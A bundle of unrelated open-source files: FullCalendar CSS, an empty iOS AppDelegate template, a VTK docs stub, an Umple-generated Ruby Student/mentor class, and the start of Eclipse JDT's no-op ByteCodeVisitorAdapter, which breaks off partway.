margin-bottom: 1em;
}
.fc-toolbar .fc-left {
float: left;
}
.fc-toolbar .fc-right {
float: right;
}
.fc-toolbar .fc-center {
display: inline-block;
}
/* the things within each left/right/center section */
.fc .fc-toolbar > * > * { /* extra precedence to override button border margins */
float: left;
margin-left: .75em;
}
/* the first thing within each left/center/right section */
.fc .fc-toolbar > * > :first-child { /* extra precedence to override button border margins */
margin-left: 0;
}
/* title text */
.fc-toolbar h2 {
margin: 0;
}
/* button layering (for border precedence) */
.fc-toolbar button {
position: relative;
}
.fc-toolbar .fc-state-hover,
.fc-toolbar .ui-state-hover {
z-index: 2;
}
.fc-toolbar .fc-state-down {
z-index: 3;
}
.fc-toolbar .fc-state-active,
.fc-toolbar .ui-state-active {
z-index: 4;
}
.fc-toolbar button:focus {
z-index: 5;
}
/* View Structure
--------------------------------------------------------------------------------------------------*/
/* undo twitter bootstrap's box-sizing rules. normalizes positioning techniques */
/* don't do this for the toolbar because we'll want bootstrap to style those buttons as some pt */
.fc-view-container *,
.fc-view-container *:before,
.fc-view-container *:after {
-webkit-box-sizing: content-box;
-moz-box-sizing: content-box;
box-sizing: content-box;
}
.fc-view, /* scope positioning and z-index's for everything within the view */
.fc-view > table { /* so dragged elements can be above the view's main element */
position: relative;
z-index: 1;
}
/* BasicView
--------------------------------------------------------------------------------------------------*/
/* day row structure */
.fc-basicWeek-view .fc-content-skeleton,
.fc-basicDay-view .fc-content-skeleton {
/* we are sure there are no day numbers in these views, so... */
padding-top: 1px; /* add a pixel to make sure there are 2px padding above events */
padding-bottom: 1em; /* ensure a space at bottom of cell for user selecting/clicking */
}
.fc-basic-view tbody .fc-row {
min-height: 4em; /* ensure that all rows are at least this tall */
}
/* a "rigid" row will take up a constant amount of height because content-skeleton is absolute */
.fc-row.fc-rigid {
overflow: hidden;
}
.fc-row.fc-rigid .fc-content-skeleton {
position: absolute;
top: 0;
left: 0;
right: 0;
}
/* week and day number styling */
.fc-basic-view .fc-week-number,
.fc-basic-view .fc-day-number {
padding: 0 2px;
}
.fc-basic-view td.fc-week-number span,
.fc-basic-view td.fc-day-number {
padding-top: 2px;
padding-bottom: 2px;
}
.fc-basic-view .fc-week-number {
text-align: center;
}
.fc-basic-view .fc-week-number span {
/* work around the way we do column resizing and ensure a minimum width */
display: inline-block;
min-width: 1.25em;
}
.fc-ltr .fc-basic-view .fc-day-number {
text-align: right;
}
.fc-rtl .fc-basic-view .fc-day-number {
text-align: left;
}
.fc-day-number.fc-other-month {
opacity: 0.3;
filter: alpha(opacity=30); /* for IE */
/* opacity with small font can sometimes look too faded
might want to set the 'color' property instead
making day-numbers bold also fixes the problem */
}
/* AgendaView all-day area
--------------------------------------------------------------------------------------------------*/
.fc-agenda-view .fc-day-grid {
position: relative;
z-index: 2; /* so the "more.." popover will be over the time grid */
}
.fc-agenda-view .fc-day-grid .fc-row {
min-height: 3em; /* all-day section will never get shorter than this */
}
.fc-agenda-view .fc-day-grid .fc-row .fc-content-skeleton {
padding-top: 1px; /* add a pixel to make sure there are 2px padding above events */
padding-bottom: 1em; /* give space underneath events for clicking/selecting days */
}
/* TimeGrid axis running down the side (for both the all-day area and the slot area)
--------------------------------------------------------------------------------------------------*/
.fc .fc-axis { /* .fc to overcome default cell styles */
vertical-align: middle;
padding: 0 4px;
white-space: nowrap;
}
.fc-ltr .fc-axis {
text-align: right;
}
.fc-rtl .fc-axis {
text-align: left;
}
.ui-widget td.fc-axis {
font-weight: normal; /* overcome jqui theme making it bold */
}
/* TimeGrid Structure
--------------------------------------------------------------------------------------------------*/
.fc-time-grid-container, /* so scroll container's z-index is below all-day */
.fc-time-grid { /* so slats/bg/content/etc positions get scoped within here */
position: relative;
z-index: 1;
}
.fc-time-grid {
min-height: 100%; /* so if height setting is 'auto', .fc-bg stretches to fill height */
}
.fc-time-grid table { /* don't put outer borders on slats/bg/content/etc */
border: 0 hidden transparent;
}
.fc-time-grid > .fc-bg {
z-index: 1;
}
.fc-time-grid .fc-slats,
.fc-time-grid > hr { /* the <hr> AgendaView injects when grid is shorter than scroller */
position: relative;
z-index: 2;
}
.fc-time-grid .fc-bgevent-skeleton,
.fc-time-grid .fc-content-skeleton {
position: absolute;
top: 0;
left: 0;
right: 0;
}
/* z-index ladder for the stacked skeleton layers within the time grid */
.fc-time-grid .fc-bgevent-skeleton {
z-index: 3;
}
.fc-time-grid .fc-highlight-skeleton {
z-index: 4;
}
.fc-time-grid .fc-content-skeleton {
z-index: 5;
}
.fc-time-grid .fc-helper-skeleton {
z-index: 6;
}
/* TimeGrid Slats (lines that run horizontally)
--------------------------------------------------------------------------------------------------*/
.fc-slats td {
height: 1.5em;
border-bottom: 0; /* each cell is responsible for its top border */
}
.fc-slats .fc-minor td {
border-top-style: dotted;
}
.fc-slats .ui-widget-content { /* for jqui theme */
background: none; /* see through to fc-bg */
}
/* TimeGrid Highlighting Slots
--------------------------------------------------------------------------------------------------*/
.fc-time-grid .fc-highlight-container { /* a div within a cell within the fc-highlight-skeleton */
position: relative; /* scopes the left/right of the fc-highlight to be in the column */
}
.fc-time-grid .fc-highlight {
position: absolute;
left: 0;
right: 0;
/* top and bottom will be set by JS */
}
/* TimeGrid Event Containment
--------------------------------------------------------------------------------------------------*/
.fc-time-grid .fc-event-container, /* a div within a cell within the fc-content-skeleton */
.fc-time-grid .fc-bgevent-container { /* a div within a cell within the fc-bgevent-skeleton */
position: relative;
}
.fc-ltr .fc-time-grid .fc-event-container { /* space on the sides of events for LTR (default) */
margin: 0 2.5% 0 2px;
}
.fc-rtl .fc-time-grid .fc-event-container { /* space on the sides of events for RTL */
margin: 0 2px 0 2.5%;
}
.fc-time-grid .fc-event,
.fc-time-grid .fc-bgevent {
position: absolute;
z-index: 1; /* scope inner z-index's */
}
.fc-time-grid .fc-bgevent {
/* background events always span full width */
left: 0;
right: 0;
}
/* TimeGrid Event Styling
----------------------------------------------------------------------------------------------------
We use the full "fc-time-grid-event" class instead of using descendants because the event won't
be a descendant of the grid when it is being dragged.
*/
.fc-time-grid-event.fc-not-start { /* events that are continuing from another day */
/* replace space made by the top border with padding */
border-top-width: 0;
padding-top: 1px;
/* remove top rounded corners */
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.fc-time-grid-event.fc-not-end {
/* replace space made by the bottom border with padding */
border-bottom-width: 0;
padding-bottom: 1px;
/* remove bottom rounded corners */
border-bottom-left-radius: 0;
border-bottom-right-radius: 0;
}
.fc-time-grid-event {
overflow: hidden; /* don't let the bg flow over rounded corners */
}
.fc-time-grid-event > .fc-content { /* contains the time and title, but no bg and resizer */
position: relative;
z-index: 2; /* above the bg */
}
.fc-time-grid-event .fc-time,
.fc-time-grid-event .fc-title {
padding: 0 1px;
}
.fc-time-grid-event .fc-time {
font-size: .85em;
white-space: nowrap;
}
.fc-time-grid-event .fc-bg {
z-index: 1;
background: #fff;
opacity: .25;
filter: alpha(opacity=25); /* for IE */
}
/* short mode, where time and title are on the same line */
.fc-time-grid-event.fc-short .fc-content {
/* don't wrap to second line (now that contents will be inline) */
white-space: nowrap;
}
.fc-time-grid-event.fc-short .fc-time,
.fc-time-grid-event.fc-short .fc-title {
/* put the time and title on the same line */
display: inline-block;
vertical-align: top;
}
.fc-time-grid-event.fc-short .fc-time span {
display: none; /* don't display the full time text... */
}
.fc-time-grid-event.fc-short .fc-time:before {
content: attr(data-start); /* ...instead, display only the start time */
}
.fc-time-grid-event.fc-short .fc-time:after {
content: "\000A0-\000A0"; /* separate with a dash, wrapped in nbsp's */
}
.fc-time-grid-event.fc-short .fc-title {
font-size: .85em; /* make the title text the same size as the time */
padding: 0; /* undo padding from above */
}
/* resizer */
.fc-time-grid-event .fc-resizer {
position: absolute;
z-index: 3; /* above content */
left: 0;
right: 0;
bottom: 0;
height: 8px;
overflow: hidden;
line-height: 8px;
font-size: 11px;
font-family: monospace;
text-align: center;
cursor: s-resize;
}
.fc-time-grid-event .fc-resizer:after {
content: "=";
}
|
{
"pile_set_name": "Github"
}
|
//
// AppDelegate.m
// Polymer
//
// Created by Logan Wright on 2/26/15.
// Copyright (c) 2015 LowriDevs. All rights reserved.
//
#import "AppDelegate.h"
@interface AppDelegate ()
/* Private class extension — no private properties or methods declared. */
@end
@implementation AppDelegate
/* Application lifecycle callbacks. All implementations below are empty
   template stubs; only the boilerplate guidance comments are present. */
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
// Override point for customization after application launch.
// Currently performs no setup; always reports a successful launch.
return YES;
}
- (void)applicationWillResignActive:(UIApplication *)application {
// Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
// Use this method to pause ongoing tasks, disable timers, and throttle down OpenGL ES frame rates. Games should use this method to pause the game.
}
- (void)applicationDidEnterBackground:(UIApplication *)application {
// Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
// If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
}
- (void)applicationWillEnterForeground:(UIApplication *)application {
// Called as part of the transition from the background to the inactive state; here you can undo many of the changes made on entering the background.
}
- (void)applicationDidBecomeActive:(UIApplication *)application {
// Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
}
- (void)applicationWillTerminate:(UIApplication *)application {
// Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
}
@end
|
{
"pile_set_name": "Github"
}
|
---
layout: api
nav: api
type: Vtk.ThreadedImageAlgorithm
---
|
{
"pile_set_name": "Github"
}
|
# PLEASE DO NOT EDIT THIS CODE
# This code was generated using the UMPLE @UMPLE_VERSION@ modeling language!
# NOTE: Ruby generator is experimental and is missing some features available
# in other Umple generated languages like Java or PHP
module Example
# Student holds a `number` attribute and a bidirectional many-to-many
# association with mentors (between 1 and 2 mentors per student).
# Mentor objects are expected to respond to index_of_student,
# add_student and remove_student — the methods below call them to keep
# both sides of the association consistent, rolling back on failure.
# NOTE: generated code — the statement order in add/remove is load-bearing.
class Student
#------------------------
# MEMBER VARIABLES
#------------------------
#Student Attributes - for documentation purposes
#attr_reader :number
#Student Associations - for documentation purposes
#attr_reader :mentors
#------------------------
# CONSTRUCTOR
#------------------------
# Creates a Student with the given number and an empty mentor list.
# @initialized/@deleted flags bracket construction and deletion state.
def initialize(a_number)
@initialized = false
@deleted = false
@number = a_number
@mentors = []
@initialized = true
end
#------------------------
# INTERFACE
#------------------------
# Replaces the student number. Always succeeds; returns true.
def set_number(a_number)
was_set = false
@number = a_number
was_set = true
was_set
end
# Returns the student number.
def get_number
@number
end
# Returns the mentor at the given index (nil if out of range).
def get_mentor(index)
a_mentor = @mentors[index]
a_mentor
end
# Returns a shallow copy of the mentor list so callers cannot
# mutate the association directly.
def get_mentors
new_mentors = @mentors.dup
new_mentors
end
# Returns the current number of mentors.
def number_of_mentors
number = @mentors.size
number
end
# True if this student has at least one mentor.
def has_mentors
has = @mentors.size > 0
has
end
# Index of the given mentor in the list, or -1 if absent
# (Java-style sentinel instead of Ruby's nil).
def index_of_mentor(a_mentor)
index = @mentors.index(a_mentor)
index = -1 if index.nil?
index
end
# True when the mentor count is within the [minimum, maximum] bounds.
def is_number_of_mentors_valid
is_valid = number_of_mentors >= Student.minimum_number_of_mentors and number_of_mentors <= Student.maximum_number_of_mentors
is_valid
end
# Association multiplicity lower bound (1..2 mentors).
def self.minimum_number_of_mentors
1
end
# Association multiplicity upper bound.
def self.maximum_number_of_mentors
2
end
# Adds a mentor, maintaining both sides of the association.
# Rejects duplicates and refuses to exceed the maximum. After adding
# locally, ensures the mentor also references this student (via
# add_student); if the reverse add fails, the local add is rolled back.
# Returns true only when both sides are consistent.
def add_mentor(a_mentor)
was_added = false
return false if index_of_mentor(a_mentor) != -1
if number_of_mentors >= Student.maximum_number_of_mentors
return was_added
end
@mentors << a_mentor
if a_mentor.index_of_student(self) != -1
was_added = true
else
was_added = a_mentor.add_student(self)
unless was_added
@mentors.delete(a_mentor)
end
end
was_added
end
# Removes a mentor, maintaining both sides of the association.
# Refuses to drop below the minimum. Removes locally first, then asks
# the mentor to remove this student; if the reverse remove fails, the
# mentor is re-inserted at its old position (rollback).
def remove_mentor(a_mentor)
was_removed = false
unless @mentors.include?(a_mentor)
return was_removed
end
if number_of_mentors <= Student.minimum_number_of_mentors
return was_removed
end
oldIndex = @mentors.index(a_mentor)
@mentors.delete_at(oldIndex)
if a_mentor.index_of_student(self) == -1
was_removed = true
else
was_removed = a_mentor.remove_student(self)
@mentors.insert(oldIndex,a_mentor) unless was_removed
end
was_removed
end
# Adds a mentor then moves it to the requested position
# (index is clamped to the valid range). No-op if add_mentor fails.
def add_mentor_at(a_mentor, index)
was_added = false
if add_mentor(a_mentor)
if(index < 0)
index = 0
end
if(index > number_of_mentors())
index = number_of_mentors() - 1
end
@mentors.delete(a_mentor)
@mentors.insert(index, a_mentor)
was_added = true
end
was_added
end
# Moves an existing mentor to the requested (clamped) position, or
# delegates to add_mentor_at when the mentor is not yet associated.
def add_or_move_mentor_at(a_mentor, index)
was_added = false
if @mentors.include?(a_mentor)
if(index < 0)
index = 0
end
if(index > number_of_mentors())
index = number_of_mentors() - 1
end
@mentors.delete(a_mentor)
@mentors.insert(index, a_mentor)
was_added = true
else
was_added = add_mentor_at(a_mentor, index)
end
was_added
end
# Marks this student deleted and detaches it from every mentor.
# Iterates over a copy because remove_student may call back into us.
def delete
@deleted = true
copy_of_mentors = @mentors.dup
@mentors.clear
copy_of_mentors.each do |a_mentor|
a_mentor.remove_student(self)
end
end
end
end
|
{
"pile_set_name": "Github"
}
|
/*******************************************************************************
* Copyright (c) 2000, 2011 IBM Corporation and others.
*
* This program and the accompanying materials
* are made available under the terms of the Eclipse Public License 2.0
* which accompanies this distribution, and is available at
* https://www.eclipse.org/legal/epl-2.0/
*
* SPDX-License-Identifier: EPL-2.0
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package org.eclipse.jdt.core.util;
/**
* Adapter that implements the IBytecodeVisitor. This class is intended to
* be subclassed by clients.
*
* @since 2.0
*/
public class ByteCodeVisitorAdapter implements IBytecodeVisitor {
/**
* @see IBytecodeVisitor#_aaload(int)
*/
@Override
public void _aaload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aastore(int)
*/
@Override
public void _aastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aconst_null(int)
*/
@Override
public void _aconst_null(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_0(int)
*/
@Override
public void _aload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_1(int)
*/
@Override
public void _aload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_2(int)
*/
@Override
public void _aload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload_3(int)
*/
@Override
public void _aload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_aload(int, int)
*/
@Override
public void _aload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_anewarray(int, int, IConstantPoolEntry)
*/
@Override
public void _anewarray(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_areturn(int)
*/
@Override
public void _areturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_arraylength(int)
*/
@Override
public void _arraylength(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_0(int)
*/
@Override
public void _astore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_1(int)
*/
@Override
public void _astore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_2(int)
*/
@Override
public void _astore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore_3(int)
*/
@Override
public void _astore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_astore(int, int)
*/
@Override
public void _astore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_athrow(int)
*/
@Override
public void _athrow(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_baload(int)
*/
@Override
public void _baload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_bastore(int)
*/
@Override
public void _bastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_bipush(int, byte)
*/
@Override
public void _bipush(int pc, byte _byte) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_caload(int)
*/
@Override
public void _caload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_castore(int)
*/
@Override
public void _castore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_checkcast(int, int, IConstantPoolEntry)
*/
@Override
public void _checkcast(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_d2f(int)
*/
@Override
public void _d2f(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_d2i(int)
*/
@Override
public void _d2i(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_d2l(int)
*/
@Override
public void _d2l(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dadd(int)
*/
@Override
public void _dadd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_daload(int)
*/
@Override
public void _daload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dastore(int)
*/
@Override
public void _dastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dcmpg(int)
*/
@Override
public void _dcmpg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dcmpl(int)
*/
@Override
public void _dcmpl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dconst_0(int)
*/
@Override
public void _dconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dconst_1(int)
*/
@Override
public void _dconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ddiv(int)
*/
@Override
public void _ddiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_0(int)
*/
@Override
public void _dload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_1(int)
*/
@Override
public void _dload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_2(int)
*/
@Override
public void _dload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload_3(int)
*/
@Override
public void _dload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dload(int, int)
*/
@Override
public void _dload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dmul(int)
*/
@Override
public void _dmul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dneg(int)
*/
@Override
public void _dneg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_drem(int)
*/
@Override
public void _drem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dreturn(int)
*/
@Override
public void _dreturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_0(int)
*/
@Override
public void _dstore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_1(int)
*/
@Override
public void _dstore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_2(int)
*/
@Override
public void _dstore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore_3(int)
*/
@Override
public void _dstore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dstore(int, int)
*/
@Override
public void _dstore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dsub(int)
*/
@Override
public void _dsub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup_x1(int)
*/
@Override
public void _dup_x1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup_x2(int)
*/
@Override
public void _dup_x2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup(int)
*/
@Override
public void _dup(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup2_x1(int)
*/
@Override
public void _dup2_x1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup2_x2(int)
*/
@Override
public void _dup2_x2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_dup2(int)
*/
@Override
public void _dup2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_f2d(int)
*/
@Override
public void _f2d(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_f2i(int)
*/
@Override
public void _f2i(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_f2l(int)
*/
@Override
public void _f2l(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fadd(int)
*/
@Override
public void _fadd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_faload(int)
*/
@Override
public void _faload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fastore(int)
*/
@Override
public void _fastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fcmpg(int)
*/
@Override
public void _fcmpg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fcmpl(int)
*/
@Override
public void _fcmpl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fconst_0(int)
*/
@Override
public void _fconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fconst_1(int)
*/
@Override
public void _fconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fconst_2(int)
*/
@Override
public void _fconst_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fdiv(int)
*/
@Override
public void _fdiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_0(int)
*/
@Override
public void _fload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_1(int)
*/
@Override
public void _fload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_2(int)
*/
@Override
public void _fload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload_3(int)
*/
@Override
public void _fload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fload(int, int)
*/
@Override
public void _fload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fmul(int)
*/
@Override
public void _fmul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fneg(int)
*/
@Override
public void _fneg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_frem(int)
*/
@Override
public void _frem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_freturn(int)
*/
@Override
public void _freturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_0(int)
*/
@Override
public void _fstore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_1(int)
*/
@Override
public void _fstore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_2(int)
*/
@Override
public void _fstore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_3(int)
*/
@Override
public void _fstore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore(int, int)
*/
@Override
public void _fstore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fsub(int)
*/
@Override
public void _fsub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_getfield(int, int, IConstantPoolEntry)
*/
@Override
public void _getfield(int pc, int index, IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_getstatic(int, int, IConstantPoolEntry)
*/
@Override
public void _getstatic(
int pc,
int index,
IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_goto_w(int, int)
*/
@Override
public void _goto_w(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_goto(int, int)
*/
@Override
public void _goto(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2b(int)
*/
@Override
public void _i2b(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2c(int)
*/
@Override
public void _i2c(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2d(int)
*/
@Override
public void _i2d(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2f(int)
*/
@Override
public void _i2f(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2l(int)
*/
@Override
public void _i2l(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2s(int)
*/
@Override
public void _i2s(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iadd(int)
*/
@Override
public void _iadd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iaload(int)
*/
@Override
public void _iaload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iand(int)
*/
@Override
public void _iand(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iastore(int)
*/
@Override
public void _iastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_0(int)
*/
@Override
public void _iconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_1(int)
*/
@Override
public void _iconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_2(int)
*/
@Override
public void _iconst_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_3(int)
*/
@Override
public void _iconst_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_4(int)
*/
@Override
public void _iconst_4(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_5(int)
*/
@Override
public void _iconst_5(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_m1(int)
*/
@Override
public void _iconst_m1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_idiv(int)
*/
@Override
public void _idiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_acmpeq(int, int)
*/
@Override
public void _if_acmpeq(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_acmpne(int, int)
*/
@Override
public void _if_acmpne(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpeq(int, int)
*/
@Override
public void _if_icmpeq(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpge(int, int)
*/
@Override
public void _if_icmpge(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpgt(int, int)
*/
@Override
public void _if_icmpgt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmple(int, int)
*/
@Override
public void _if_icmple(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmplt(int, int)
*/
@Override
public void _if_icmplt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpne(int, int)
*/
@Override
public void _if_icmpne(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifeq(int, int)
*/
@Override
public void _ifeq(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifge(int, int)
*/
@Override
public void _ifge(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifgt(int, int)
*/
@Override
public void _ifgt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifle(int, int)
*/
@Override
public void _ifle(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iflt(int, int)
*/
@Override
public void _iflt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifne(int, int)
*/
@Override
public void _ifne(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifnonnull(int, int)
*/
@Override
public void _ifnonnull(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifnull(int, int)
*/
@Override
public void _ifnull(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iinc(int, int, int)
*/
@Override
public void _iinc(int pc, int index, int _const) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_0(int)
*/
@Override
public void _iload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_1(int)
*/
@Override
public void _iload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_2(int)
